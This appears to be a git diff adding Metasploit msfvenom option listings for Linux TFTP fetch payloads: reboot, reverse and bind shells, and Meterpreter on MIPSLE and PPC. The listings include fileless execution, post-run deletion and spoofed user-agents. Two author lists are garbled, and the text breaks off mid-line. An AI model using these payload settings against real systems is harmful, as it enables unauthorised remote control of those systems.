+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-reboot.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-reboot.txt new file mode 100644 index 0000000..402f32b --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-reboot.txt 
@@ -0,0 +1,68 @@ + + Name: TFTP Fetch, Linux Reboot + Module: payload/cmd/linux/tftp/mipsle/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZBLbJzxLV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell-reverse_tcp.txt new file mode 100644 index 0000000..4a32e43 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell-reverse_tcp.txt 
@@ -0,0 +1,91 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/mipsle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME vFbSaYWacCAG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_bind_tcp.txt new file mode 100644 index 0000000..0f25ba4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_bind_tcp.txt 
@@ -0,0 +1,74 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/mipsle/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MLjwAMCkf no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_reverse_tcp.txt new file mode 100644 index 0000000..6924112 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-shell_reverse_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/mipsle/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LHZwVOPa no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_http.txt new file mode 100644 index 0000000..3278b7d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/ppc/meterpreter_reverse_http: +========================= + +ent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LBoqZIckdYz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_https.txt new file mode 100644 index 0000000..d13edaf --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/ppc/meterpreter_reverse_https: +========================= + +t_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME gvBMJcvItb no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..603c04d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-ppc-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/ppc/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kOpfhMJhgHG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an PPC payload from an TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 